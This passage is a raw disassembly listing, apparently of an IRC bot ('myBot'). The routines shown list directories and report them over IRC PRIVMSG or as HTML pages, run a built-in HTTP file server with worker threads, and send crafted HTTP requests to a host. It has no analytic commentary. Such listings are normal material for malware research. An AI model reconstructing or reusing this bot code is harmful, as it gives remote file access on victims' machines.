sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_4034B5: ; CODE XREF: sub_4030C4+3F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4034B5
sub eax, esi
cmp eax, 1Eh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_4034D7
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_4034DC
; ---------------------------------------------------------------------------
loc_4034D7: ; CODE XREF: sub_4030C4+40A�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_4034DC: ; CODE XREF: sub_4030C4+411�j
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_4034EF: ; CODE XREF: sub_4030C4+430�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4034EF
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push ebx
jmp loc_4036BF
; ---------------------------------------------------------------------------
loc_403520: ; CODE XREF: sub_4030C4+361�j
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_412E0D
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_40354D: ; CODE XREF: sub_4030C4+4CA�j
lea eax, [ebp+var_24C]
push 200h
push eax
call sub_412E0D
add esp, 24h
jmp loc_4036CE
; ---------------------------------------------------------------------------
loc_403566: ; CODE XREF: sub_4030C4+2FC�j
inc [ebp+var_4]
cmp [ebp+arg_8], edi
jz short loc_403590
push edi
push [ebp+var_36C]
call sub_402439
push eax
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_40354D
; ---------------------------------------------------------------------------
loc_403590: ; CODE XREF: sub_4030C4+4A8�j
cmp [ebp+arg_C], edi
jz loc_4036A4
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_4035BC: ; CODE XREF: sub_4030C4+4FD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4035BC
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS ; "%s%s"
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_4035FF: ; CODE XREF: sub_4030C4+540�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4035FF
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_403623: ; CODE XREF: sub_4030C4+564�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403623
sub eax, esi
cmp eax, 1Fh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_403645
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_40364A
; ---------------------------------------------------------------------------
loc_403645: ; CODE XREF: sub_4030C4+578�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_40364A: ; CODE XREF: sub_4030C4+57F�j
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_40365D: ; CODE XREF: sub_4030C4+59E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40365D
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
mov eax, [ebp+var_36C]
shr eax, 0Ah
push eax
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_412E0D
add esp, 1Ch
jmp short loc_4036CE
; ---------------------------------------------------------------------------
loc_4036A4: ; CODE XREF: sub_4030C4+4CF�j
push [ebp+var_36C]
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push 200h
loc_4036BF: ; CODE XREF: sub_4030C4+457�j
lea eax, [ebp+var_24C]
push eax
call sub_412E0D
add esp, 18h
loc_4036CE: ; CODE XREF: sub_4030C4+34E�j
; sub_4030C4+49D�j ...
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_4036D7: ; CODE XREF: sub_4030C4+618�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4036D7
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
cmp [ebp+arg_8], edi
jz short loc_403702
push 0FAh
call ds:dword_41F000
loc_403702: ; CODE XREF: sub_4030C4+25C�j
; sub_4030C4+274�j ...
lea eax, [ebp+var_38C]
push eax
push [ebp+var_C]
call ds:dword_41F050
test eax, eax
jnz loc_403319
loc_40371A: ; CODE XREF: sub_4030C4+24A�j
push [ebp+var_C]
call ds:dword_41F044
xor esi, esi
cmp [ebp+arg_8], esi
jz short loc_40375F
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_402439
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_402439
pop ecx
pop ecx
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_412BB5
add esp, 14h
jmp short loc_40378D
; ---------------------------------------------------------------------------
loc_40375F: ; CODE XREF: sub_4030C4+664�j
cmp [ebp+arg_C], esi
lea eax, [ebp+var_24C]
jz short loc_403779
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_40378D
; ---------------------------------------------------------------------------
loc_403779: ; CODE XREF: sub_4030C4+6A4�j
push [ebp+var_8]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_412BB5
add esp, 10h
loc_40378D: ; CODE XREF: sub_4030C4+699�j
; sub_4030C4+6B3�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_403796: ; CODE XREF: sub_4030C4+6D7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403796
push esi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4030C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037B8 proc near ; CODE XREF: sub_4039DE+12B�p
var_40C = byte ptr -40Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
push ebx
push esi
xor esi, esi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov [ebp+var_4], 400h
mov [ebp+var_C], esi
call ds:dword_41F03C
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_403875
push esi
push ebx
call ds:dword_41F060
mov edx, eax
cmp edx, esi
mov [ebp+var_8], edx
jz short loc_40386E
push edi
jmp short loc_403806
; ---------------------------------------------------------------------------
loc_403803: ; CODE XREF: sub_4037B8+B3�j
mov edx, [ebp+var_8]
loc_403806: ; CODE XREF: sub_4037B8+49�j
xor eax, eax
cmp [ebp+var_4], edx
mov ecx, 100h
lea edi, [ebp+var_40C]
rep stosd
jbe short loc_40381D
mov [ebp+var_4], edx
loc_40381D: ; CODE XREF: sub_4037B8+60�j
push 2
push esi
neg edx
push edx
push ebx
call ds:dword_41F05C
push esi
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push ebx
call ds:dword_41F058
push esi
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push [ebp+arg_0]
call dword_433534
cmp eax, 0FFFFFFFFh
jnz short loc_403868
call dword_433558
cmp eax, 2733h
jnz short loc_40386D
xor eax, eax
loc_403868: ; CODE XREF: sub_4037B8+9F�j
sub [ebp+var_8], eax
jnz short loc_403803
loc_40386D: ; CODE XREF: sub_4037B8+AC�j
pop edi
loc_40386E: ; CODE XREF: sub_4037B8+46�j
push ebx
call ds:dword_41F034
loc_403875: ; CODE XREF: sub_4037B8+31�j
pop esi
pop ebx
leave
retn
sub_4037B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403879 proc near ; CODE XREF: sub_403B4C+182�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ebx
mov ecx, eax
push esi
xor esi, esi
lea edx, [ecx+1]
loc_403888: ; CODE XREF: sub_403879+14�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_403888
sub ecx, edx
mov [ebp+arg_0], ecx
jz short loc_4038B3
loc_403896: ; CODE XREF: sub_403879+38�j
cmp byte ptr [esi+eax], 5Ch
jnz short loc_4038A0
mov byte ptr [esi+eax], 2Fh
loc_4038A0: ; CODE XREF: sub_403879+21�j
mov ecx, eax
inc esi
lea edx, [ecx+1]
loc_4038A6: ; CODE XREF: sub_403879+32�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_4038A6
sub ecx, edx
cmp esi, ecx
jb short loc_403896
loc_4038B3: ; CODE XREF: sub_403879+1B�j
pop esi
pop ebx
pop ebp
retn
sub_403879 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038B7 proc near ; CODE XREF: sub_4078FA+4DC0�p
var_4A4 = byte ptr -4A4h
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A4h
push edi
lea eax, [ebp+var_4A4]
push eax
push 101h
call dword_4334B0
push 6
push 1
push 2
call dword_4334A0
push [ebp+arg_14]
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
mov [ebp+var_14], 2
call dword_4335EC
push [ebp+arg_10]
mov [ebp+var_12], ax
call sub_406B1D
pop ecx
mov [ebp+var_10], eax
push 10h
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
call dword_433458
cmp eax, 0FFFFFFFFh
jz short loc_403997
mov eax, [ebp+arg_20]
test eax, eax
jnz short loc_40392A
mov eax, (offset asc_41FA74+2)
loc_40392A: ; CODE XREF: sub_4038B7+6C�j
push ebx
push esi
push [ebp+arg_10]
mov ebx, 100h
push eax
push [ebp+arg_1C]
lea eax, [ebp+var_114]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_114]
add esp, 1Ch
lea esi, [eax+1]
loc_403959: ; CODE XREF: sub_4038B7+A7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403959
push 0
sub eax, esi
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
call dword_433534
push 40h
pop ecx
push 0
push ebx
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
xor esi, esi
lea edi, [ebp+var_114]
rep movsd
call dword_433414
pop esi
pop ebx
loc_403997: ; CODE XREF: sub_4038B7+65�j
push [ebp+var_4]
call dword_4335AC
call dword_4335B8
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_314]
push eax
call sub_412BB5
cmp [ebp+arg_C], 0
pop ecx
pop ecx
pop edi
jnz short locret_4039DC
push 0
push [ebp+arg_8]
lea eax, [ebp+var_314]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
locret_4039DC: ; CODE XREF: sub_4038B7+109�j
leave
retn
sub_4038B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4039DE proc near ; DATA XREF: sub_403B4C+24E�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov eax, 1654h
lea ebp, [esp-74h]
call sub_412DD0
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+74h+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+74h+var_3C8]
push eax
lea eax, [ebp+74h+var_550]
push eax
call sub_412BB5
lea eax, [ebp+74h+var_2C4]
push eax
lea eax, [ebp+74h+var_654]
push eax
call sub_412BB5
xor ebx, ebx
add esp, 10h
cmp [ebp+74h+var_A4], ebx
lea eax, [ebp+74h+var_9C]
jz short loc_403A46
push offset aTextHtml ; "text/html"
jmp short loc_403A4B
; ---------------------------------------------------------------------------
loc_403A46: ; CODE XREF: sub_4039DE+5F�j
push offset aApplicationOct ; "application/octet-stream"
loc_403A4B: ; CODE XREF: sub_4039DE+66�j
push eax
call sub_412BB5
pop ecx
pop ecx
push 46h
lea eax, [ebp+74h+var_68]
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call ds:dword_41F068
push 1Eh
lea eax, [ebp+74h+var_20]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_41F064
cmp [ebp+74h+var_B8], 0FFFFFFFFh
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_9C]
jnz short loc_403AB8
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_412BB5
add esp, 24h
jmp short loc_403AD0
; ---------------------------------------------------------------------------
loc_403AB8: ; CODE XREF: sub_4039DE+C1�j
push [ebp+74h+var_B8]
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_412BB5
add esp, 28h
loc_403AD0: ; CODE XREF: sub_4039DE+D8�j
lea eax, [ebp+74h+var_1654]
lea edx, [eax+1]
loc_403AD9: ; CODE XREF: sub_4039DE+100�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_403AD9
push ebx
sub eax, edx
push eax
lea eax, [ebp+74h+var_1654]
push eax
push [ebp+74h+var_44C]
call dword_433534
cmp [ebp+74h+var_A4], ebx
jnz short loc_403B12
lea eax, [ebp+74h+var_550]
push eax
push [ebp+74h+var_44C]
call sub_4037B8
pop ecx
pop ecx
jmp short loc_403B2F
; ---------------------------------------------------------------------------
loc_403B12: ; CODE XREF: sub_4039DE+11C�j
lea eax, [ebp+74h+var_654]
push eax
push ebx
push [ebp+74h+var_44C]
lea eax, [ebp+74h+var_550]
push eax
call sub_4030C4
add esp, 10h
loc_403B2F: ; CODE XREF: sub_4039DE+132�j
push [ebp+74h+var_44C]
call dword_4335AC
push [ebp+74h+var_B4]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_4039DE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B4C proc near ; CODE XREF: sub_403E06+37C�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_210]
rep stosd
mov eax, [ebp+arg_8]
xor esi, esi
cmp byte ptr [eax], 2Fh
mov [ebp+var_4], esi
push eax
jz short loc_403B7A
push offset aS_6 ; "\\%s"
jmp short loc_403B82
; ---------------------------------------------------------------------------
loc_403B7A: ; CODE XREF: sub_403B4C+25�j
mov byte ptr [eax], 5Ch
push offset aS_1 ; "%s"
loc_403B82: ; CODE XREF: sub_403B4C+2C�j
lea eax, [ebp+var_10C]
push eax
call sub_412BB5
lea eax, [ebp+var_10C]
add esp, 0Ch
xor edi, edi
lea ecx, [eax+1]
loc_403B9C: ; CODE XREF: sub_403B4C+55�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_403B9C
sub eax, ecx
mov [ebp+arg_8], eax
jz short loc_403C22
push 2
pop ebx
loc_403BAD: ; CODE XREF: sub_403B4C+D4�j
lea eax, [ebp+var_10C]
lea edx, [eax+1]
loc_403BB6: ; CODE XREF: sub_403B4C+6F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403BB6
sub eax, edx
cmp ebx, eax
jnb short loc_403BEF
cmp [ebp+esi+var_10C], 25h
jnz short loc_403BEF
cmp [ebp+esi+var_10B], 32h
jnz short loc_403BEF
cmp [ebp+esi+var_10A], 30h
jnz short loc_403BEF
inc esi
inc esi
inc ebx
mov [ebp+edi+var_210], 20h
inc ebx
jmp short loc_403C09
; ---------------------------------------------------------------------------
loc_403BEF: ; CODE XREF: sub_403B4C+75�j
; sub_403B4C+7F�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_403BFF
push 5Ch
pop eax
jmp short loc_403C02
; ---------------------------------------------------------------------------
loc_403BFF: ; CODE XREF: sub_403B4C+AC�j
movsx eax, al
loc_403C02: ; CODE XREF: sub_403B4C+B1�j
mov [ebp+edi+var_210], al
loc_403C09: ; CODE XREF: sub_403B4C+A1�j
inc esi
lea eax, [ebp+var_10C]
inc ebx
inc edi
lea ecx, [eax+1]
loc_403C15: ; CODE XREF: sub_403B4C+CE�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_403C15
sub eax, ecx
cmp esi, eax
jb short loc_403BAD
loc_403C22: ; CODE XREF: sub_403B4C+5C�j
lea eax, [ebp+var_210]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_314]
push offset aSS ; "%s%s"
push eax
call sub_412BB5
lea eax, [ebp+var_314]
push offset asc_420328 ; "\n"
push eax
call sub_413859
add esp, 18h
lea eax, [ebp+var_314]
push eax
call ds:dword_41F06C
xor ebx, ebx
inc ebx
cmp eax, 10h
jz short loc_403C73
cmp eax, 0FFFFFFFFh
jnz short loc_403C76
push [ebp+arg_0]
jmp loc_403CFB
; ---------------------------------------------------------------------------
loc_403C73: ; CODE XREF: sub_403B4C+118�j
mov [ebp+var_4], ebx
loc_403C76: ; CODE XREF: sub_403B4C+11D�j
cmp [ebp+edi+var_211], 5Ch
jnz short loc_403C83
mov [ebp+var_4], ebx
loc_403C83: ; CODE XREF: sub_403B4C+132�j
mov eax, [ebp+arg_0]
xor edi, edi
cmp [ebp+var_4], edi
mov [ebp+var_6C4], eax
mov [ebp+var_318], edi
jz short loc_403D06
cmp [ebp+arg_C], edi
jz short loc_403CFA
lea edi, [ebp+var_314]
dec edi
loc_403CA5: ; CODE XREF: sub_403B4C+15F�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_403CA5
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
mov esi, offset asc_4205E4 ; "*"
push eax
movsw
call sub_412BB5
lea eax, [ebp+var_210]
push eax
call sub_403879
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_412BB5
or [ebp+var_330], 0FFFFFFFFh
add esp, 14h
mov [ebp+var_31C], ebx
xor edi, edi
jmp short loc_403D55
; ---------------------------------------------------------------------------
loc_403CFA: ; CODE XREF: sub_403B4C+150�j
push eax
loc_403CFB: ; CODE XREF: sub_403B4C+122�j
call dword_4335AC
jmp loc_403DED
; ---------------------------------------------------------------------------
loc_403D06: ; CODE XREF: sub_403B4C+14B�j
push edi
push edi
push 3
push edi
push ebx
push 80000000h
lea eax, [ebp+var_314]
push eax
call ds:dword_41F03C
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_403D55
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_412BB5
pop ecx
pop ecx
push edi
push esi
mov [ebp+var_31C], edi
call ds:dword_41F060
push esi
mov [ebp+var_330], eax
call ds:dword_41F034
loc_403D55: ; CODE XREF: sub_403B4C+1AC�j
; sub_403B4C+1D7�j
mov esi, [ebp+arg_10]
push esi
lea eax, [ebp+var_8C4]
push offset aHttpdWorkerThr ; "[HTTPD]: Worker thread of server thread"...
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_8C4]
push 4
push eax
call sub_410EEA
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_43433C[eax], esi
lea eax, [ebp+var_8]
push eax
push edi
lea eax, [ebp+var_6C4]
push eax
push offset sub_4039DE
push edi
push edi
call ds:dword_41F00C
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_403DFC
push [ebp+arg_0]
call dword_4335AC
call ds:dword_41F008
push eax
lea eax, [ebp+var_8C4]
push offset aHttpdFailedT_0 ; "[HTTPD]: Failed to start worker thread,"...
push eax
call sub_412BB5
lea eax, [ebp+var_8C4]
push eax
call sub_401C33
add esp, 10h
loc_403DED: ; CODE XREF: sub_403B4C+1B5�j
; sub_403B4C+2B8�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_403DF4: ; CODE XREF: sub_403B4C+2B6�j
push 5
call ds:dword_41F000
loc_403DFC: ; CODE XREF: sub_403B4C+26F�j
cmp [ebp+var_318], edi
jz short loc_403DF4
jmp short loc_403DED
sub_403B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_403E06 proc near ; DATA XREF: sub_401141+363�o
; sub_4078FA+3FA2�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_464 = byte ptr -464h
var_360 = dword ptr -360h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_340 = byte ptr -340h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_412DD0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+var_6F0]
rep movsd
push [ebp+var_360]
xor esi, esi
inc esi
mov [eax+3ACh], esi
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_14], esi
mov [ebp+var_24], 2
call dword_4335EC
and [ebp+var_20], 0
push 0
push esi
push 2
mov [ebp+var_22], ax
call dword_4334A0
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
mov [ebp+var_8], ebx
jz loc_4041D9
mov eax, [ebp+var_358]
imul eax, 234h
mov dword_434344[eax], ebx
push 10h
lea eax, [ebp+var_24]
push eax
push ebx
call dword_433578
cmp eax, edi
jz loc_4041D9
push 7FFFFFFFh
push ebx
call dword_4335C0
cmp eax, edi
jz loc_4041D9
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push ebx
call dword_433444
cmp eax, edi
jz loc_4041D9
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov [ebp+var_124], ebx
mov [ebp+var_128], esi
mov [ebp+var_4], ebx
lea eax, [ebx+1]
jmp loc_4041BB
; ---------------------------------------------------------------------------
loc_403EEB: ; CODE XREF: sub_403E06+3CD�j
xor esi, esi
mov [ebp+arg_0], esi
loc_403EF0: ; CODE XREF: sub_403E06+39C�j
lea eax, [ebp+var_23C]
push eax
push esi
call dword_4334F4
test eax, eax
jz loc_404198
cmp esi, ebx
jnz short loc_403F6D
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_138]
push eax
push ebx
mov [ebp+var_10], 10h
call dword_433464
cmp eax, 0FFFFFFFFh
jz loc_404198
mov edx, [ebp+var_128]
xor ecx, ecx
test edx, edx
jbe short loc_403F46
loc_403F38: ; CODE XREF: sub_403E06+13E�j
cmp [ebp+ecx*4+var_124], eax
jz short loc_403F46
inc ecx
cmp ecx, edx
jb short loc_403F38
loc_403F46: ; CODE XREF: sub_403E06+130�j
; sub_403E06+139�j
cmp ecx, edx
jnz short loc_403F5C
cmp edx, 40h
jnb short loc_403F5C
mov [ebp+ecx*4+var_124], eax
inc [ebp+var_128]
loc_403F5C: ; CODE XREF: sub_403E06+142�j
; sub_403E06+147�j
cmp eax, [ebp+var_4]
jbe loc_404198
mov [ebp+var_4], eax
jmp loc_404198
; ---------------------------------------------------------------------------
loc_403F6D: ; CODE XREF: sub_403E06+102�j
mov edx, 400h
xor eax, eax
mov ecx, edx
lea edi, [ebp+var_28F0]
rep stosd
push eax
mov ecx, edx
lea edi, [ebp+var_18F0]
rep stosd
push 1000h
lea eax, [ebp+var_28F0]
push eax
push esi
call dword_433414
test eax, eax
jg short loc_403FF1
push esi
call dword_4335AC
xor eax, eax
cmp [ebp+var_128], eax
jbe loc_404198
loc_403FB5: ; CODE XREF: sub_403E06+1BF�j
cmp [ebp+eax*4+var_124], esi
jz short loc_403FDB
inc eax
cmp eax, [ebp+var_128]
jb short loc_403FB5
jmp loc_404198
; ---------------------------------------------------------------------------
loc_403FCC: ; CODE XREF: sub_403E06+1DE�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
inc eax
loc_403FDB: ; CODE XREF: sub_403E06+1B6�j
mov ecx, [ebp+var_128]
dec ecx
cmp eax, ecx
jb short loc_403FCC
dec [ebp+var_128]
jmp loc_404198
; ---------------------------------------------------------------------------
loc_403FF1: ; CODE XREF: sub_403E06+198�j
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_340]
rep stosd
lea eax, [ebp+var_28F0]
xor ebx, ebx
xor esi, esi
lea ecx, [eax+1]
loc_40400B: ; CODE XREF: sub_403E06+20A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40400B
sub eax, ecx
mov [ebp+var_C], eax
jz loc_404195
loc_40401D: ; CODE XREF: sub_403E06+2D0�j
mov al, [ebp+ebx+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_4040C0
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40409A
lea eax, [ebp+var_18F0]
lea edx, [eax+1]
loc_404054: ; CODE XREF: sub_403E06+253�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404054
sub eax, edx
cmp eax, 5
jbe short loc_40409A
mov eax, offset asc_41FA74 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_413920
pop ecx
pop ecx
push eax
call sub_413920
pop ecx
pop ecx
push eax
call sub_413859
pop ecx
pop ecx
lea edx, [ebp+var_340]
loc_40408E: ; CODE XREF: sub_403E06+290�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40408E
jmp short loc_4040AE
; ---------------------------------------------------------------------------
loc_40409A: ; CODE XREF: sub_403E06+243�j
; sub_403E06+25A�j
push 3
mov edi, offset asc_420620 ; "\r\n"
lea esi, [ebp+var_18F0]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_4040E1
